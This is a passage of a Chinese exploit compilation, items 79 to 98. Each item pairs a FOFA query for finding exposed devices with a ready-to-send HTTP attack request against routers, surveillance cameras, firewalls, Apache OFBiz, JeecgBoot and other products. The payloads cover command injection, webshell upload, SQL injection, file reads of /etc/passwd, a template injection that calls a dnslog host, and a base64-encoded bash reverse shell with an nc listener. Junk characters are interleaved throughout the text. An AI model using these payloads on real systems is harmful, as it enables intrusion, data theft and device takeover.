$ j! N! r6 |# c6 h& m6 E/ A' F/Applications/SkillDevelopAndEHS/
" O2 {( a4 X9 u0 H6 w" Y------YsOxWxSvj1KyZow1PTsh98fdu6l--
4 G7 T9 ?( C" R4 T
, G5 G( r! t: I$ y; n# U, k& O+ X( a) w, r& G
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
$ N4 K, l# B7 `7 \Host: x.x.x.x5 B2 P" h4 n- q/ O
0 H1 B, D- `- A1 I1 K
# ^0 J2 @7 E- r W+ U79. BYTEVALUE 百为流控路由器远程命令执行# A2 _- A/ S/ O$ ~1 B
FOFA:BYTEVALUE 智能流控路由器
L( T0 r& e' N$ Q$ wGET /goform/webRead/open/?path=|id HTTP/1.1
2 ^) }: `2 W2 x) zHost:IP
: |) I } U0 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
h4 L6 Y8 @8 ^5 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# i3 U; O; M: x0 d0 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 g7 U! U1 J3 S" ?+ a3 SAccept-Encoding: gzip, deflate
$ y. A4 A+ p& I/ m( I' } ]5 \Connection: close
- j4 u, d' F) ]& VUpgrade-Insecure-Requests: 1
9 N3 T1 x# K4 G* Z6 U' R* I4 y5 {! J: }* c' Q# q* V$ {
& O: ]! a8 D. {. [. V9 _
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传% ] q- o* m! X& i, }3 t" S; [
FOFA:app="速达软件-公司产品"6 ?6 O2 s. J# q( \8 t9 J' o1 g
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.17 X! z4 z a: c- u* R, q) L! p
Host: x.x.x.x
% V* ]* K, U" n6 k0 w6 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 O. r( w2 R7 Z$ l" d3 A8 rContent-Length: 27
4 q) [! \3 P' g! Z9 y. A# l# tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 e7 ?; b2 H; n+ |& N/ U5 S0 q
Accept-Encoding: gzip, deflate
0 ?- t/ r: e6 X% _7 X) v: IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 O3 ?& T# `5 c( L- f4 ~Connection: close
4 u' v3 e' c- }* \+ fContent-Type: application/octet-stream
1 |! l$ Q* G! s! r* _4 k+ UUpgrade-Insecure-Requests: 1 p) w' _$ j4 _" J+ |3 B* [* V
8 {4 V' ]' y0 U0 @: S<% out.print("oessqeonylzaf");%>
& r$ B- B; ~3 Z6 h3 F0 d: p0 K0 }% z$ j! o' m1 q! M9 Q
1 g( q& N/ r& v9 y8 }2 G3 OGET /xykqmfxpoas.jsp HTTP/1.1
+ u' V1 Q- i: i. [& X2 QHost: x.x.x.x9 N8 ~- u( a% V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# n0 |8 k0 Z9 @* I* OConnection: close; T8 i! O2 }3 Y# o: A0 o$ _
Accept-Encoding: gzip
, I6 p7 u( R1 l T8 m9 @, P$ _) s) I3 \9 ], u
: q! A. C5 u3 u: |& p81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
7 p* ~9 O5 w- ]5 T! \FOFA:app="uniview-视频监控"
5 E$ _* n4 Y1 [; r) GGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
& B Z$ V. d3 [! qHost: x.x.x.x& H( S4 A y: k9 V- A; _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 L. H! P, b* Z& q
Connection: close
; s5 c1 I- v1 l+ D" A8 U: s: h3 e" EAccept-Encoding: gzip( J4 A+ H* `& o
* f5 y$ i0 J2 V/ q) E1 ]! S) L7 Y( \/ a [ [8 x! h# W8 D' L/ m
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
1 ~; Y2 z- |. s+ R- {3 gFOFA:app="思福迪-LOGBASE"
0 Y5 ^$ V5 [) j' U( n! T, \! i/ I# uPOST /bhost/test_qrcode_b HTTP/1.1 X8 g5 d; v; {! E! V B
Host: BaseURL' g$ p3 T% k1 y
User-Agent: Go-http-client/1.1
: [& }& u* I9 W! N( `% V2 jContent-Length: 23" l$ O" a. X$ R; {: M8 g, U
Accept-Encoding: gzip. B' ^( S0 o. S
Connection: close
& C; t$ h" Q ^# E* B+ t3 PContent-Type: application/x-www-form-urlencoded
0 W( W( t0 d+ l7 p! l5 qReferer: BaseURL
0 Q S; x8 q2 t; c4 d
5 A) i% Z& R6 u' L# rz1=1&z2="|id;"&z3=bhost6 m3 ]' [8 o( {( Z8 {
2 u5 J% g+ t/ d- _0 w4 a2 K. ^* i
3 j P2 u7 a1 M l: E3 w( V83. JeecgBoot testConnection 远程命令执行' d6 l& \9 o9 w4 P1 G
FOFA:title=="JeecgBoot 企业级低代码平台"9 j. q$ m+ g6 l! u. @; s
# x. k; c( E, V) U6 I$ v! m& M6 l. b$ x2 b
POST /jmreport/testConnection HTTP/1.1
# ?2 q$ v( J# M6 ~7 g3 IHost: x.x.x.x/ f' s) v* }. C' L% {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
k. ]6 v6 P# Y' o' [6 JConnection: close
0 D% [ d) _8 Y6 NContent-Length: 88810 ~8 `+ @' @) Z9 P% z
Accept-Encoding: gzip9 o+ w Q: K4 o+ E
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# {& ]( n9 k9 Y6 r1 E
Content-Type: application/json( A8 n/ {6 g% Y$ O
0 B9 x6 ]8 P8 f t/ e: y
PAYLOAD
$ }" G. e# c9 F ]3 w% T7 z0 p, w. U+ u O
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入$ c6 a$ V0 \+ j! `7 F
FOFA:title=="JeecgBoot 企业级低代码平台"( l$ ~( I% M6 d+ P. w% r
! I7 q3 g- c# B2 R
7 o7 y- q" e0 V: i, N4 p! _; J7 p' A5 ~4 r! F5 Y
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
7 ]- W* N7 c5 n$ `! |4 RHost: 192.168.40.130:80808 s/ w9 A" I8 {9 r' B% d
User-Agent: curl/7.88.1
2 i' p) I7 G- S- J1 ~/ VContent-Length: 156
l0 I- a# X# E: t$ hAccept: */*$ e7 x ^8 b7 X0 [
Connection: close
* O; X& O/ K6 ~5 \2 hContent-Type: application/json
* w! U- H% y% I, ~* Q7 ~/ _- hAccept-Encoding: gzip
6 t4 s5 k7 t* V; L8 x h4 e0 X* V* K5 f6 b
{ A% T% [ [( y9 u
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
. ^6 e$ _9 S/ S2 I. v "type": "0"
, ^3 D; M0 U2 e! t' C4 @' \}( }6 ]) e6 j; ]! l
3 H4 Z/ D/ B7 |, H/ f: p5 [
3 S( q4 p+ u& B }# t85. SysAid On-premise< 23.3.36远程代码执行/ y$ z8 \; M( G9 D1 J R# H
CVE-2023-47246
I; C% G y6 l- p) qFOFA:body="sysaid-logo-dark-green.png" ' P6 H% B+ e Y: N1 k
EXP数据包如下,注入哥斯拉马) g2 i- U, t4 h7 j( [( n
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.11 S2 _$ i1 w, `" U: u, C# L( }
Host: x.x.x.x7 k) \& S$ ~/ q6 R Z# \2 p T/ l! v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: X: ~0 }6 s7 O! E5 n& h" b6 }Content-Type: application/octet-stream; V8 M# B+ r4 A9 Z5 I9 t4 {, r' V
Accept-Encoding: gzip1 Z. _& Q# `5 |
" D# P+ d/ A4 c: o( sPAYLOAD
i) t9 Q% [4 E$ T: D; U* F& C) f& _' k- [) g! ?) z$ a- p7 c3 l
回显URL:http://x.x.x.x/userfiles/index.jsp
# ], Z( J$ a" x
+ c$ d5 z$ v) s- a: h5 E: A86. 日本tosei自助洗衣机RCE# s( K6 t- L2 t% ^
FOFA:body="tosei_login_check.php"
$ D* S8 w7 K7 f3 @3 w" n1 g* B5 XPOST /cgi-bin/network_test.php HTTP/1.1
; o, V6 I9 K6 ~( ]Host: x.x.x.x
Q2 J8 E5 {) w, E3 ?6 j2 M' nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ E3 |2 {6 w( ]6 {5 x5 TConnection: close
+ K8 h' R* @! z" G4 ~1 }, rContent-Length: 44% ~2 b8 F4 w. ^# R" X, F# ]
Accept: */*
3 T" @4 K% p4 SAccept-Encoding: gzip% b7 M% e: I- v% @1 V3 r9 X
Accept-Language: en5 d9 u6 x) O; z- w l( b
Content-Type: application/x-www-form-urlencoded
% b! k; Z, K6 p p
6 s1 P, X8 P, T% A9 B$ Q! bhost=%0acat${IFS}/etc/passwd%0a&command=ping
* a+ Q9 f) V7 R P/ @( d
6 Z6 N$ ]# r9 d& t- P& y0 D
/ M2 M4 X g/ b1 \5 k% l87. 安恒明御安全网关aaa_local_web_preview文件上传" ~5 G0 P$ E% w
FOFA:title="明御安全网关"3 A' m4 Q3 e/ z1 y; e7 {5 J2 G' b& J
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
4 ?& p' j! p7 ^- q- ?Host: X.X.X.X$ s. Q% P( p0 ~8 p* s& C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 N! B& n3 }2 g, x; x; W! B& u) oConnection: close
+ ?" U7 t% d+ H" [7 c" h3 UContent-Length: 198
Z5 a; ^0 a3 i! _. j+ X% ^' tAccept-Encoding: gzip( U/ F1 x, `2 c7 j% E
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd3 D. |8 k, T% R8 R5 L
4 x4 D) { d' e; X& x$ a$ k3 r--qqobiandqgawlxodfiisporjwravxtvd
% X8 G+ f. O; ^6 `; FContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
( n9 b/ h$ `& w) FContent-Type: text/plain4 n4 I P9 I0 `" F7 \" w. n8 H# H
. U+ H- `/ o7 w2 _2 X) g
2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ O9 Z- T& }3 ?+ j i* o1 o4 ?
--qqobiandqgawlxodfiisporjwravxtvd--
. t4 ~9 X$ W' @! G/ H- |- ~# r( {, U) \4 }. m0 X
4 y" V+ _0 M* O& ^! H( V+ C
/jfhatuwe.php
9 u9 P8 T" o8 l& }; z/ @0 ~3 R
* q% z) d& ^7 T l H88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 |( S! T9 Z) j4 G% K) t$ i% yFOFA:title="明御安全网关"
& _6 v! i6 R1 z& |8 ?6 cGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
8 [) u' L2 ~, F: v2 R$ r/ t$ NHost: x.x.x.xx.x.x.x
; F/ O* |. I) k xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' }3 o0 y% c* ?3 l, B& LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ x" B% {* r. V5 Q/ sAccept-Encoding: gzip, deflate
/ z' B7 P# ]( k6 v0 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ^3 M7 s' ~$ u5 t0 B& g$ w* ~4 |
Connection: close
- A/ v: k; n' e6 X
( S# c0 W _/ }2 H$ y9 O P' a% @! G6 M4 C6 w+ ^' `1 w
/astdfkhl.php, K: K/ t* a' R) Z
& }4 b# [: F% a; i2 q
89. 致远互联FE协作办公平台editflow_manager存在sql注入5 ]) \& d7 V! F6 R" {: Z' ~7 {* o
FOFA:title="FE协作办公平台" || body="li_plugins_download"
8 D1 @$ X. @, C) FPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
2 W3 E' ^2 i+ _: [: _Host: x.x.x.x' g+ n9 x) u5 k9 m ^0 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ b! }- S) W3 A- Z5 q* N! E0 l
Connection: close9 V+ E9 A# _' U* R0 k( N) w6 t" k
Content-Length: 41
) o5 }# e, d: A3 e; v' `! xContent-Type: application/x-www-form-urlencoded
& Y* M. v; f& O6 E" ]$ @. w8 J4 T6 EAccept-Encoding: gzip, ~$ P$ G( g. g9 [ V) k% N
( Z$ t# [, `9 k- E; ooption=2&GUID=-1'+union+select+111*222--+
: r7 {2 q8 S+ k7 g# z
2 j1 ~2 w& \/ W
0 G$ z$ ?9 B- F# n$ c' l! Q90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行5 v/ E+ ?% | c3 D9 u; c/ ^
FOFA:icon_hash="-1830859634"
' t- Y; s1 H' b; mPOST /php/ping.php HTTP/1.1
$ ^$ I' x3 ?$ J& |Host: x.x.x.x
1 Q. V k& A% ^3 v: a2 Z6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
7 K9 e/ h; y& B6 A- D" S; kContent-Length: 51
7 }8 v' b- W- ~( g8 z0 w! yAccept: application/json, text/javascript, */*; q=0.01% K7 w H Q- T8 A9 V
Accept-Encoding: gzip, deflate
* ~ m$ f( i/ L( }/ l8 Z" ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 [3 G# p. g+ b. t) f+ k g
Connection: close
' Y9 k! ?% {4 i% \* P) JContent-Type: application/x-www-form-urlencoded
, Y \; r `1 _4 B G Q$ O3 NX-Requested-With: XMLHttpRequest
0 w8 d9 p, A/ a6 b, D
% D$ D4 i" X6 C" R+ S$ d+ U0 ~7 q3 tjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
1 m: i! Y5 ~; Z' G
- o& q' ~& [+ _ u O" w2 z
+ S* [- v. ]) U0 U9 }% I' E: R; s91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" _& G- G( l! V8 \$ d' T! h# l; \FOFA:title="综合安防管理平台"
; R9 {7 o, P& qGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
! ~/ t: p2 p# G7 R: R ?8 [Host: your-ip% N8 x5 s' b2 Q/ |3 f& n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ \, d& A, Y1 r# iAccept-Encoding: gzip, deflate0 [! ]1 g0 C* Y2 _6 g5 Q
Accept: */*
5 `$ y M9 H1 @" C( E, G. _Connection: keep-alive
/ ^9 V8 {: R' G& D5 B9 l- p) n3 W- c1 V2 w
& @2 d9 E4 ?, z' G6 o3 i3 k1 _
4 e0 t! V! E% F0 Z- d92. 海康威视运行管理中心session命令执行& K" ^0 f( Y( J* V/ {
Fastjson命令执行8 q# e# m( P3 i( H- \: |4 t% y' J4 c
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
q7 s/ @. e4 D$ ^! }POST /center/api/session HTTP/1.1
* m# {+ d# y9 e* o$ {* N0 vHost:
+ y J( t c' s# ?. t W9 ~Accept: application/json, text/plain, */*1 x/ k9 o0 q l$ ?) E$ c
Accept-Encoding: gzip, deflate$ y& S! U! @: ~% G' w7 D! a
X-Requested-With: XMLHttpRequest
6 W* _( O& a/ k4 ^5 A/ f' ?) xContent-Type: application/json;charset=UTF-8" S# q0 a: Y) N3 j, R7 q/ U
X-Language-Type: zh_CN
4 I- {6 Z6 B- A; Z. mTestcmd: echo test) H% q) V0 t8 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
, V6 t5 N7 y$ yAccept-Language: zh-CN,zh;q=0.9( ]% k% d4 E$ R
Content-Length: 5778
% G; {- p0 o! |+ T8 e
7 i3 g2 k. h/ Z- MPAYLOAD
$ r, a# f! _5 G1 n/ L# d( _+ Z9 G# ~( y4 ~) m0 r
3 b! I9 e) b G% e2 F
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传$ ^, F6 |# j/ G( J" P# g
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
" O# s/ T4 |5 ~) D: f# ]3 PPOST /?g=app_av_import_save HTTP/1.1
# R3 _$ z9 W8 d3 ^$ RHost: x.x.x.x
5 q( Q) A: Z8 ^! \9 M( lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
9 @3 Y3 \6 C" a! ~8 {( rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* @& L7 x* @/ i# [" k
0 p9 D/ T2 \5 u7 l6 C, d {5 b------WebKitFormBoundarykcbkgdfx$ c# `4 R2 L. O2 C
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2 o% a) d5 K3 O1 `$ S n. G: O- `" Z ?$ e7 Q& \2 ^3 H
10000000, r: V. w& B; s; ?/ Y) E1 s
------WebKitFormBoundarykcbkgdfx
1 |# R( R0 P% M& @4 B5 qContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"" o; S4 d4 H( u, o7 O
Content-Type: text/plain; _1 N- b( |2 [7 O
) x2 j, l9 h6 N# p5 l6 _: v. kwagletqrkwrddkthtulxsqrphulnknxa
0 j7 l3 I# Q1 F! R. @------WebKitFormBoundarykcbkgdfx
8 a9 g3 f2 ^, N3 k, C6 {8 Q1 N8 FContent-Disposition: form-data; name="submit_post"+ h1 T) j! E0 A1 _8 d; A7 x! G
! r0 |0 a, A5 F' n1 j% Iobj_app_upfile
8 @) ?7 I& z }/ n+ _------WebKitFormBoundarykcbkgdfx& `1 M5 `: q. q- l& e
Content-Disposition: form-data; name="__hash__"- ^, E$ ?0 [$ [) ?/ ?
: \9 L/ }) z I6 Z7 @0b9d6b1ab7479ab69d9f71b05e0e9445
0 o { T. r8 m( @( Y2 F0 k' i# T8 Q2 M------WebKitFormBoundarykcbkgdfx--
R) d! ^/ ~" U2 y+ q' \6 U( {; L. R7 |$ p
7 t8 P1 C9 R% `GET /attachements/xlskxknxa.txt HTTP/1.1
* N; \. i" b. H- c' H% fHost: xx.xx.xx.xx
. w) a* U* p6 u, N- y0 _& w8 w& CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 y0 i" C ?/ ]5 D- f) h) W D U- o, J: [
; @$ |- H1 [8 M
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% D) a# ^) e! X, o. _+ D, [FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
7 i/ i( g: ]2 h; s# jPOST /?g=obj_area_import_save HTTP/1.1
' f) Y h: ^8 D' A# |- \# o5 ~2 KHost: x.x.x.x9 ?( A% p6 `( B: _, J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
+ b1 x4 n) ^3 z" Q0 `9 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. Y4 G8 B* S7 \( n4 n# J3 ^) k' {7 r! @) [7 X
------WebKitFormBoundarybqvzqvmt4 p+ I" l8 K; X. i" f1 c; F/ D2 u
Content-Disposition: form-data; name="MAX_FILE_SIZE"
+ |# i6 v% D i! X+ m- Q
m1 c) h: K; Q' n& I10000000% {! P4 ~2 B7 W" A7 m
------WebKitFormBoundarybqvzqvmt6 P( A) _5 R8 ]0 ~. E3 `1 \
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
5 ^0 G; H% ]5 o, K; r }& x7 r5 ?Content-Type: text/plain
7 C/ N7 I2 y* o/ w/ a. x
! s! h* K+ g d1 o& R) \pxplitttsrjnyoafavcajwkvhxindhmu
4 x$ w# U$ d0 K" r------WebKitFormBoundarybqvzqvmt- R- T3 g5 Q1 q: ?9 b
Content-Disposition: form-data; name="submit_post") s, ~/ }% R, h
5 ~% M' P) n7 |' q, W6 v
obj_app_upfile
5 }/ n9 y# t7 [6 N$ {' S------WebKitFormBoundarybqvzqvmt p4 a$ d9 B! y) P( k: L
Content-Disposition: form-data; name="__hash__"% d$ J1 Y& ]2 H& |6 x+ Z. @( T
4 W% r8 l) R( c' ~8 ]: U0b9d6b1ab7479ab69d9f71b05e0e9445
7 E. c" W4 P" L) M; p------WebKitFormBoundarybqvzqvmt--) b+ P( J' @8 R+ a0 ?& W
$ Q/ }# s4 {) Y% P4 p
6 N- [; W/ R2 C) |4 M5 X3 i- z& t+ r# `7 E: n
GET /attachements/xlskxknxa.txt HTTP/1.1
- e; N. q9 `( e4 |, xHost: xx.xx.xx.xx4 r# y4 X5 f$ L+ z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 j" z5 v, W% v. B% e* {
1 z! g0 a! O8 W8 O0 [* Z7 g7 o& n" ]: | i( U! k
; Y% L, @7 ]( I7 `; i7 t
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
3 t/ x. P( S5 T7 h7 H( RCVE-2023-490703 ?9 C) q/ d* v
FOFA:app="Apache_OFBiz"
$ C) T1 N. R2 q" l/ S* ?POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
6 w i- N8 c, SHost: x.x.x.x6 v2 S, `- h+ b4 Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 q2 x- i7 w* O( v2 SConnection: close
# h. B' S, X# p' J9 b# t; m6 cContent-Length: 889! _& G5 _8 j* q
Content-Type: application/xml# J" }4 H2 \1 x0 d
Accept-Encoding: gzip
$ C$ U3 b) R' G' u
/ O5 X% L" O( f$ n- L! R<?xml version="1.0"?>6 b1 A+ n, q/ E, a# k( h9 P
<methodCall>
( ~" ^9 T' y7 D" h9 B4 U u <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
1 D7 ^1 F- ~7 c. P8 ] <params>, B& s K3 J3 ~- j. b, s
<param>
* T+ f5 B* C" i+ J <value>
/ M" O. K* D$ H9 T% {, h <struct>1 ^! L% h, y2 A, }# \# p- S
<member>
# D1 A; m4 `# V0 t; K) D <name>test</name>
( m8 c2 l) H4 M: z2 v7 }+ I4 w <value>! N4 b5 F/ F- I: P+ {# Y; \% M
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>4 j# |% u: y; H2 l# ]1 a
</value>
+ f$ Q( o6 R% W3 z. \: q </member>- o7 F8 x' N/ n0 E
</struct>
$ ?2 h a* X0 F2 T Z0 a9 j3 R0 X& R0 t* U </value>% y2 `2 W; a2 Y0 `4 f
</param>
( a2 Y# G3 B$ l; Q i' L$ A8 b </params>
( P& i/ y6 ]8 ?1 Z. C+ v</methodCall>
! _/ e9 k6 z+ N6 h5 ` F9 h- q& j0 y. Z/ G) c& h6 D; P
/ X7 i) f e2 T用ysoserial生成payload* b# D$ Y! m( j8 Z
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"3 Z% ?: p: J3 q5 D; {2 W: g
; b9 U: Q8 v' o
- w4 \; _6 ]5 c" L- N7 B, b将生成的payload替换到上面的POC V* ~6 l8 a) @
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
4 ?' Q |- p; I& W' [% r& U( ^9 ZHost: 192.168.40.130:8443
& m. D+ y) C% ~! x/ LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 o0 @0 i# A3 c1 [1 k) H2 [
Connection: close1 \1 d I. u) j' y. b! E
Content-Length: 8893 h! C' f. L/ ^1 ]4 k
Content-Type: application/xml/ p# p* R& D& Y. ?
Accept-Encoding: gzip. {, C; X% n/ f) x6 s8 t* b
! `! D1 O9 }: f& A; g) ~
PAYLOAD
) f* X) q) c5 g* A2 i) R$ U
7 Q1 a: ^3 k" C( O: j96. Apache OFBiz 18.12.11 groovy 远程代码执行/ d, G @3 K g8 r9 G5 s
FOFA:app="Apache_OFBiz"5 f, L4 L4 T; Q9 O! N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1# \- \) s" \! g4 _0 D
Host: localhost:8443% m: n/ M n- K, @ l0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) Q. O2 k( S5 T8 G6 @7 Z* u
Accept: */*
" a3 H5 c( W0 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 }& U2 k- a+ \9 U, a
Content-Type: application/x-www-form-urlencoded
/ R! I @! b9 g: jContent-Length: 55
& S2 g( w. b' |# f N. N' V' _6 K b" ~0 Q" w; L9 F1 u: X; Q y3 B
groovyProgram=throw+new+Exception('id'.execute().text);
9 i& O2 q6 r# Q! G* V, }' a4 s- G7 O$ N& H5 r( w
% H5 x5 {( f/ M8 p# V* ^: N
反弹shell
: g4 S% `0 X+ C+ ^在kali上启动一个监听, b, V; Q: A$ z. C
nc -lvp 7777
+ _- U% a1 P: \$ d# M& k2 _( a# f ]# h( C0 F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% W/ N5 G( F% ~2 ^
Host: 192.168.40.130:84433 s' d) z4 p7 \. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ ?/ Z' t) \+ M5 r2 a
Accept: */*
/ R, }5 F' A' i4 d, o! q" {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! X0 }4 F" l+ nContent-Type: application/x-www-form-urlencoded* F! O8 W2 q F' f* [
Content-Length: 71
- E0 z Y8 \. ~; r8 \4 }, F Q' O0 x# T
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
w( Y: W% f+ v3 }0 K6 c- F, x6 N! Q2 F% }
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
4 A+ k) I4 U& ^, F9 DFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
1 L* Y% c9 ]: C& m C( S# WGET /passport/login/ HTTP/1.14 p. h$ n; N- H+ a0 k* g1 b3 m9 r/ ~
Host: 192.168.40.130:8085
! w7 a/ J- j4 I' kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! j; U( U5 y% }+ {! O0 J6 v0 X
Accept-Encoding: gzip- X8 O6 E5 C1 L" X/ a. t$ N
Connection: close
. ^% n" N5 {3 U9 q' h" WCookie: rememberMe=PAYLOAD
" O) p9 ?6 X( S, D" _; k; MX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"! ~8 V' J6 O2 U# H! c
! j+ B5 h1 ^( E" m9 G6 i+ y
" V: w3 U9 F' Z, A1 d0 K- o( [3 I- K6 q6 n98. SpiderFlow爬虫平台远程命令执行
! t- ?7 c1 Z8 u) P2 |$ c3 M- ICVE-2024-0195
# d5 }1 g: s$ s& C$ | XFOFA:app="SpiderFlow"
0 M X5 E Z1 V" cPOST /function/save HTTP/1.1. m3 d; V+ u7 u# e
Host: 192.168.40.130:80888 S- O* i# ~; T3 c5 |, @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
